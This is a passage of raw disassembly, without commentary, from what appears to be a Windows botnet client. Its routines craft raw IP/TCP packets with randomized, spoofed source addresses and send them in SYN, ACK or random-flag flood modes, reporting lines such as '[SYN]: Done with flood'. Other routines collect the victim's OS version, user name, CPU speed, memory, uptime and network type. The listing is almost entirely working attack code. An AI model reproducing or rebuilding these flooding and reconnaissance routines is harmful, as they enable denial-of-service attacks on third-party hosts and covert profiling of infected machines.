rep stosd
stosw
stosb
lea eax, [ebp+68h+var_288]
push eax
push 202h
call dword_4357F8 ; WSAStartup
test eax, eax
jz short loc_4112A6
xor eax, eax
jmp loc_4114E2
; ---------------------------------------------------------------------------
loc_4112A6: ; CODE XREF: sub_41126C+31�j
push esi
xor edi, edi
inc edi
push edi
xor esi, esi
push esi
push esi
push 0FFh
push 3
push 2
call dword_43576C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+68h+var_4], eax
jz loc_4114D9
push 4
lea ecx, [ebp+68h+var_3C]
push ecx
push 2
push esi
push eax
mov [ebp+68h+var_3C], edi
call dword_435804 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4114D0
xor eax, eax
lea edi, [ebp+68h+var_54]
stosd
stosd
stosd
push ebx
push [ebp+68h+arg_8]
stosd
mov [ebp+68h+var_54], 2
call dword_435934 ; ntohs
mov ebx, [ebp+68h+arg_0]
push 28h
mov [ebp+68h+var_52], ax
mov [ebp+68h+var_50], ebx
mov [ebp+68h+var_30], 45h
call dword_435934 ; ntohs
push [ebp+68h+arg_8]
mov [ebp+68h+var_2E], ax
mov [ebp+68h+var_2C], 1
mov [ebp+68h+var_2A], si
mov [ebp+68h+var_28], 80h
mov [ebp+68h+var_27], 6
mov [ebp+68h+var_26], si
mov [ebp+68h+var_20], ebx
call dword_435934 ; ntohs
push 4000h
mov [ebp+68h+var_1A], ax
mov [ebp+68h+var_14], esi
mov [ebp+68h+var_10], 50h
mov [ebp+68h+var_F], 2
call dword_435934 ; ntohs
mov [ebp+68h+var_E], ax
lea eax, [ebp+68h+var_5C]
push eax
mov [ebp+68h+var_A], si
mov [ebp+68h+var_8], esi
call ds:dword_420030 ; QueryPerformanceFrequency
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
push [ebp+68h+var_58]
mov eax, [ebp+68h+arg_C]
push [ebp+68h+var_5C]
cdq
push edx
push eax
call sub_414E90
add eax, [ebp+68h+var_38]
mov [ebp+68h+var_C], si
adc edx, [ebp+68h+var_34]
mov [ebp+68h+var_44], eax
mov [ebp+68h+var_40], edx
jmp short loc_4113C3
; ---------------------------------------------------------------------------
loc_411397: ; CODE XREF: sub_41126C+22F�j
add [ebp+68h+var_8], eax
lea eax, [ebp+68h+var_38]
push eax
call ds:dword_42002C ; QueryPerformanceCounter
mov eax, [ebp+68h+var_34]
cmp eax, [ebp+68h+var_40]
jg loc_4114CC
jl short loc_4113BE
mov eax, [ebp+68h+var_38]
cmp eax, [ebp+68h+var_44]
jnb loc_4114CC
loc_4113BE: ; CODE XREF: sub_41126C+144�j
and [ebp+68h+var_C], 0
loc_4113C3: ; CODE XREF: sub_41126C+129�j
call sub_4147A1
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_435934 ; ntohs
mov [ebp+68h+var_1C], ax
call sub_4147A1
call sub_4147A1
push eax
call dword_435934 ; ntohs
push [ebp+68h+arg_4]
movzx eax, ax
mov [ebp+68h+var_18], eax
call dword_43590C ; ntohl
inc [ebp+68h+arg_4]
and [ebp+68h+var_74], 0
mov esi, eax
push 14h
mov [ebp+68h+var_24], esi
mov [ebp+68h+var_78], ebx
mov [ebp+68h+var_73], 6
call dword_435934 ; ntohs
push 8
pop ecx
mov [ebp+68h+var_7C], esi
mov [ebp+68h+var_72], ax
push 5
lea esi, [ebp+68h+var_7C]
lea edi, [ebp+68h+var_B8]
rep movsd
pop ecx
lea eax, [ebp+68h+var_B8]
push 34h
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_98]
push eax
rep movsd
call sub_407DA7
push 5
pop ecx
push 5
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
mov [ebp+68h+var_C], ax
pop ecx
lea esi, [ebp+68h+var_1C]
lea edi, [ebp+68h+var_A4]
rep movsd
xor eax, eax
lea edi, [ebp+68h+var_90]
stosd
lea eax, [ebp+68h+var_B8]
push 28h
push eax
call sub_407DA7
add esp, 10h
push 5
pop ecx
push 10h
mov [ebp+68h+var_26], ax
lea eax, [ebp+68h+var_54]
push eax
push 0
push 28h
lea eax, [ebp+68h+var_B8]
push eax
push [ebp+68h+var_4]
lea esi, [ebp+68h+var_30]
lea edi, [ebp+68h+var_B8]
rep movsd
call dword_4357B8 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_411397
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+68h+var_F8]
push offset aSynSendErrorD_ ; "[SYN]: Send error: <%d>."
push eax
call sub_4145E5
lea eax, [ebp+68h+var_F8]
push eax
call sub_401EFF
add esp, 10h
xor esi, esi
jmp short loc_4114CF
; ---------------------------------------------------------------------------
loc_4114CC: ; CODE XREF: sub_41126C+13E�j
; sub_41126C+14C�j
mov esi, [ebp+68h+var_8]
loc_4114CF: ; CODE XREF: sub_41126C+25E�j
pop ebx
loc_4114D0: ; CODE XREF: sub_41126C+74�j
push [ebp+68h+var_4]
call dword_4358F4 ; closesocket
loc_4114D9: ; CODE XREF: sub_41126C+58�j
call dword_435900 ; WSACleanup
mov eax, esi
pop esi
loc_4114E2: ; CODE XREF: sub_41126C+35�j
pop edi
add ebp, 68h
leave
retn
sub_41126C endp
; =============== S U B R O U T I N E =======================================
sub_4114E8 proc near ; CODE XREF: sub_411540+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_407C3B
push [esp+10h+arg_4]
mov esi, eax
call sub_414972
push [esp+14h+arg_8]
mov ebx, eax
call sub_414972
mov edi, eax
call sub_4147A1
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_41126C
add esp, 1Ch
test eax, eax
jnz short loc_411531
inc eax
loc_411531: ; CODE XREF: sub_4114E8+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4114E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411540 proc near ; DATA XREF: sub_408A18+2A07�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 85h
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_4114E8
push eax
lea eax, [ebp+var_414]
push offset aSynDoneWithFlo ; "[SYN]: Done with flood (%iKB/sec)."
push eax
call sub_4145E5
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4115BD
push esi
push [ebp+var_C]
lea eax, [ebp+var_414]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_4056FB
add esp, 14h
loc_4115BD: ; CODE XREF: sub_411540+5B�j
lea eax, [ebp+var_414]
push eax
call sub_401EFF
push [ebp+var_10]
call sub_412735
pop ecx
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_411540 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4115DB proc near ; CODE XREF: sub_401000+74�p
; sub_408A18+4720�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_47C164
push esi
call sub_41483D
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_4115DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_41162E proc near ; CODE XREF: sub_4037CA+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
push esi
lea eax, [ebp+78h+var_94]
push eax
xor esi, esi
mov [ebp+78h+var_94], 94h
call ds:dword_420120 ; GetVersionExA
test eax, eax
jz short loc_41169E
cmp [ebp+78h+var_90], 4
jnz short loc_411680
cmp [ebp+78h+var_8C], esi
jnz short loc_41166E
cmp [ebp+78h+var_84], 1
jnz short loc_411663
inc esi
loc_411663: ; CODE XREF: sub_41162E+32�j
cmp [ebp+78h+var_84], 2
jnz short loc_41169E
xor esi, esi
inc esi
jmp short loc_41169E
; ---------------------------------------------------------------------------
loc_41166E: ; CODE XREF: sub_41162E+2C�j
cmp [ebp+78h+var_8C], 0Ah
jnz short loc_411678
loc_411674: ; CODE XREF: sub_41162E+5B�j
push 2
jmp short loc_41169D
; ---------------------------------------------------------------------------
loc_411678: ; CODE XREF: sub_41162E+44�j
cmp [ebp+78h+var_8C], 5Ah
jnz short loc_41169E
jmp short loc_411691
; ---------------------------------------------------------------------------
loc_411680: ; CODE XREF: sub_41162E+27�j
cmp [ebp+78h+var_90], 5
jnz short loc_41169E
cmp [ebp+78h+var_8C], esi
jz short loc_411674
cmp [ebp+78h+var_8C], 1
jnz short loc_411695
loc_411691: ; CODE XREF: sub_41162E+50�j
push 3
jmp short loc_41169D
; ---------------------------------------------------------------------------
loc_411695: ; CODE XREF: sub_41162E+61�j
cmp [ebp+78h+var_8C], 2
jnz short loc_41169E
push 7
loc_41169D: ; CODE XREF: sub_41162E+48�j
; sub_41162E+65�j
pop esi
loc_41169E: ; CODE XREF: sub_41162E+21�j
; sub_41162E+39�j ...
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_41162E endp
; =============== S U B R O U T I N E =======================================
sub_4116A6 proc near ; CODE XREF: sub_41175C+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_4116AE: ; CODE XREF: sub_4116A6+2F�j
; sub_4116A6+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_420000 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_416160
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_4116AE
jb short loc_4116DD
cmp ebx, edi
ja short loc_4116AE
loc_4116DD: ; CODE XREF: sub_4116A6+31�j
push 0
push 64h
push esi
push ebx
call sub_4160E0
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_411750
jb short loc_4116FC
cmp edi, 50h
jnb short loc_411701
loc_4116FC: ; CODE XREF: sub_4116A6+4F�j
push 4Bh
pop eax
xor edx, edx
loc_411701: ; CODE XREF: sub_4116A6+54�j
test ecx, ecx
ja short loc_411750
jb short loc_41170C
cmp edi, 47h
jnb short loc_411711
loc_41170C: ; CODE XREF: sub_4116A6+5F�j
push 42h
pop eax
xor edx, edx
loc_411711: ; CODE XREF: sub_4116A6+64�j
test ecx, ecx
ja short loc_411750
jb short loc_41171C
cmp edi, 37h
jnb short loc_411721
loc_41171C: ; CODE XREF: sub_4116A6+6F�j
push 32h
pop eax
xor edx, edx
loc_411721: ; CODE XREF: sub_4116A6+74�j
test ecx, ecx
ja short loc_411750
jb short loc_41172C
cmp edi, 26h
jnb short loc_411731
loc_41172C: ; CODE XREF: sub_4116A6+7F�j
push 21h
pop eax
xor edx, edx
loc_411731: ; CODE XREF: sub_4116A6+84�j
test ecx, ecx
ja short loc_411750
jb short loc_41173C
cmp edi, 1Eh
jnb short loc_411741
loc_41173C: ; CODE XREF: sub_4116A6+8F�j
push 19h
pop eax
xor edx, edx
loc_411741: ; CODE XREF: sub_4116A6+94�j
test ecx, ecx
ja short loc_411750
jb short loc_41174C
cmp edi, 0Ah
jnb short loc_411750
loc_41174C: ; CODE XREF: sub_4116A6+9F�j
xor eax, eax
xor edx, edx
loc_411750: ; CODE XREF: sub_4116A6+4D�j
; sub_4116A6+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_4116A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_41175C proc near ; CODE XREF: sub_408A18+4917�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 420AEAh
mov [ebp+70h+var_CC], 94h
call ds:dword_420120 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_4117CD
cmp [ebp+70h+var_C4], ebx
jnz short loc_4117AF
cmp [ebp+70h+var_BC], 1
jnz short loc_41179C
mov [ebp+70h+var_4], offset a95 ; "95"
loc_41179C: ; CODE XREF: sub_41175C+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_411833
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_41180A
; ---------------------------------------------------------------------------
loc_4117AF: ; CODE XREF: sub_41175C+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_4117BE
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_411804
; ---------------------------------------------------------------------------
loc_4117BE: ; CODE XREF: sub_41175C+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_4117FD
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_411804
; ---------------------------------------------------------------------------
loc_4117CD: ; CODE XREF: sub_41175C+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_4117FD
cmp [ebp+70h+var_C4], ebx
jnz short loc_4117E1
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_411804
; ---------------------------------------------------------------------------
loc_4117E1: ; CODE XREF: sub_41175C+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_4117F0
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_411804
; ---------------------------------------------------------------------------
loc_4117F0: ; CODE XREF: sub_41175C+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_411804
loc_4117FD: ; CODE XREF: sub_41175C+66�j
; sub_41175C+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_411804: ; CODE XREF: sub_41175C+60�j
; sub_41175C+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_411833
loc_41180A: ; CODE XREF: sub_41175C+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_411833
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_5 ; "%s (%s)"
push eax
call sub_4145E5
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_411833: ; CODE XREF: sub_41175C+44�j
; sub_41175C+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_435878
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_411866
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_411866: ; CODE XREF: sub_41175C+FB�j
push [ebp+70h+arg_4]
call sub_407D51
pop ecx
push eax
call dword_43585C ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_4358D8 ; gethostbyaddr
cmp eax, ebx
jz short loc_41188F
push dword ptr [eax]
jmp short loc_411894
; ---------------------------------------------------------------------------
loc_41188F: ; CODE XREF: sub_41175C+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_411894: ; CODE XREF: sub_41175C+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_4145E5
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42009C ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_420098 ; GetTimeFormatA
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call ds:dword_420130 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_415D0D
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_402C41
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_4115DB
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_407D51
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_402B3D
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_402B3D
pop ecx
pop ecx
push eax
call sub_4116A6
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_41483D
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_41175C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_4119C3 proc near ; CODE XREF: sub_408A18+3778�p
; sub_408A18+4946�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_435960, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_411A29
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_435930 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_411A0A
lea eax, [ebp+6Ch+var_8C]
push offset dword_42876C
push eax
call sub_4145E5
pop ecx
pop ecx
loc_411A0A: ; CODE XREF: sub_4119C3+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_411A22
push offset dword_428764
loc_411A18: ; CODE XREF: sub_4119C3+64�j
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_411A47
; ---------------------------------------------------------------------------
loc_411A22: ; CODE XREF: sub_4119C3+4E�j
push offset dword_428760
jmp short loc_411A18
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_4119C3+1D�j
push esi
mov esi, offset off_42875C
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_4145E5
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_4145E5
add esp, 10h
pop esi
loc_411A47: ; CODE XREF: sub_4119C3+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_407D51
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_41483D
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_4119C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_411A79 proc near ; DATA XREF: sub_408A18+53BF�o
var_13A8 = word ptr -13A8h
var_BD8 = byte ptr -0BD8h
var_BD7 = byte ptr -0BD7h
var_BC4 = byte ptr -0BC4h
var_BB8 = byte ptr -0BB8h
var_BB0 = byte ptr -0BB0h
var_BA4 = byte ptr -0BA4h
var_408 = byte ptr -408h
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 13A8h
call sub_414800
mov eax, [ebp+arg_0]
and [ebp+var_BD8], 0
push ebx
push esi
push edi
mov ebx, ds:dword_420004
mov esi, eax
push 69h
pop ecx
lea edi, [ebp+var_208]
rep movsd
xor esi, esi
inc esi
mov [eax+1A0h], esi
xor eax, eax
mov ecx, 1F3h
lea edi, [ebp+var_BD7]
rep stosd
stosw
stosb
call ebx ; GetTickCount
push eax
call sub_414794
pop ecx
push 0FFh
push 3
push 2
call dword_4357E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_411B42
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_408]
push offset aTcpErrorSocket ; "[TCP]: Error: socket() failed, returned"...
push eax
call sub_4145E5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_6C], esi
jnz short loc_411B23
loc_411B03: ; CODE XREF: sub_411A79+52B�j
push esi
push [ebp+var_70]
lea eax, [ebp+var_408]
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_208]
call sub_4056FB
add esp, 14h
loc_411B23: ; CODE XREF: sub_411A79+88�j
; sub_411A79+525�j
lea eax, [ebp+var_408]
push eax
call sub_401EFF
push [ebp+var_84]
call sub_412735
pop ecx
pop ecx
push esi
jmp loc_411F62
; ---------------------------------------------------------------------------
loc_411B42: ; CODE XREF: sub_411A79+66�j
push 4
lea ecx, [ebp+var_34]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+var_34], esi
call dword_435804 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_411B85
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_408]
push offset aTcpErrorSetsoc ; "[TCP]: Error: setsockopt() failed, retu"...
push eax
call sub_4145E5
add esp, 0Ch
loc_411B77: ; CODE XREF: sub_411A79+131�j
cmp [ebp+var_6C], edi
jnz loc_411F48
jmp loc_411F28
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411A79+E1�j
lea eax, [ebp+var_204]
push eax
call dword_43585C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_411BAC
lea eax, [ebp+var_408]
push offset aTcpInvalidTarg ; "[TCP]: Invalid target IP."
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_411B77
; ---------------------------------------------------------------------------
loc_411BAC: ; CODE XREF: sub_411A79+11C�j
xor eax, eax
lea edi, [ebp+var_44]
stosd
stosd
stosd
stosd
xor edi, edi
push edi
mov [ebp+var_44], 2
call dword_435934 ; ntohs
mov [ebp+var_42], ax
lea eax, [ebp+var_204]
push eax
call dword_43585C ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], edi
call ebx ; GetTickCount
mov [ebp+var_1C], eax
call ebx ; GetTickCount
sub eax, [ebp+var_1C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_78]
ja loc_411EDD
mov [ebp+var_30], 45h
mov [ebp+var_2C], si
mov [ebp+var_2A], di
mov [ebp+var_28], 80h
mov [ebp+var_27], 6
mov [ebp+var_C], 50h
mov [ebp+var_6], di
loc_411C13: ; CODE XREF: sub_411A79+45E�j
cmp [ebp+var_74], edi
mov [ebp+var_26], di
jz short loc_411C43
call sub_4147A1
mov esi, eax
shl esi, 8
call sub_4147A1
add esi, eax
shl esi, 8
call sub_4147A1
add esi, eax
shl esi, 8
call sub_4147A1
add esi, eax
jmp short loc_411C58
; ---------------------------------------------------------------------------
loc_411C43: ; CODE XREF: sub_411A79+1A1�j
push [ebp+var_208]
call sub_407D51
pop ecx
push eax
call dword_43585C ; inet_addr
mov esi, eax
loc_411C58: ; CODE XREF: sub_411A79+1C8�j
cmp [ebp+var_80], edi
mov eax, [ebp+var_40]
mov [ebp+var_24], esi
mov [ebp+var_20], eax
jnz short loc_411C73
call sub_4147A1
add eax, 401h
push eax
jmp short loc_411C76
; ---------------------------------------------------------------------------
loc_411C73: ; CODE XREF: sub_411A79+1EB�j
push [ebp+var_80]
loc_411C76: ; CODE XREF: sub_411A79+1F8�j
call dword_435934 ; ntohs
cmp [ebp+var_7C], edi
mov [ebp+var_16], ax
jnz short loc_411C95
call sub_4147A1
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_411C98
; ---------------------------------------------------------------------------
loc_411C95: ; CODE XREF: sub_411A79+20A�j
push [ebp+var_7C]
loc_411C98: ; CODE XREF: sub_411A79+21A�j
call dword_435934 ; ntohs
mov [ebp+var_18], ax
call sub_4147A1
mov ebx, eax
shl ebx, 8
call sub_4147A1
add ebx, eax
shl ebx, 8
call sub_4147A1
add ebx, eax
shl ebx, 8
call sub_4147A1
add ebx, eax
push ebx
call dword_43590C ; ntohl
mov [ebp+var_14], eax
call sub_4147A1
shl eax, 1
cdq
mov ecx, 578h
idiv ecx
lea eax, [ebp+var_184]
push offset aSyn ; "syn"
push eax
mov ebx, edx
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_411D05
mov [ebp+var_10], edi
mov [ebp+var_B], 2
jmp loc_411D88
; ---------------------------------------------------------------------------
loc_411D05: ; CODE XREF: sub_411A79+27E�j
lea eax, [ebp+var_184]
push offset aAck ; "ack"
push eax
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_411D3D
call sub_4147A1
mov edi, eax
shl edi, 10h
call sub_4147A1
or edi, eax
push edi
call dword_43590C ; ntohl
mov [ebp+var_10], eax
mov [ebp+var_B], 18h
jmp short loc_411D86
; ---------------------------------------------------------------------------
loc_411D3D: ; CODE XREF: sub_411A79+2A1�j
lea eax, [ebp+var_184]
push offset aRandom_0 ; "random"
push eax
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_411D88
call sub_4147A1
mov edi, eax
shl edi, 10h
call sub_4147A1
or edi, eax
push edi
call dword_43590C ; ntohl
mov [ebp+var_10], eax
call sub_4147A1
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 16h
add dl, cl
mov [ebp+var_B], dl
loc_411D86: ; CODE XREF: sub_411A79+2C2�j
xor edi, edi
loc_411D88: ; CODE XREF: sub_411A79+287�j
; sub_411A79+2D9�j
lea eax, [ebx+28h]
push eax
call dword_435934 ; ntohs
push 1000h
mov [ebp+var_2E], ax
call dword_435934 ; ntohs
and [ebp+var_5C], 0
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_60], eax
lea eax, [ebx+14h]
push eax
mov [ebp+var_8], di
mov [ebp+var_64], esi
mov [ebp+var_5B], 6
call dword_435934 ; ntohs
mov [ebp+var_5A], ax
mov eax, ebx
cdq
sub eax, edx
mov esi, eax
sar esi, 1
cmp esi, edi
jle short loc_411DE7
loc_411DD5: ; CODE XREF: sub_411A79+36C�j
call sub_4147A1
mov [ebp+edi*2+var_13A8], ax
inc edi
cmp edi, esi
jl short loc_411DD5
loc_411DE7: ; CODE XREF: sub_411A79+35A�j
push 8
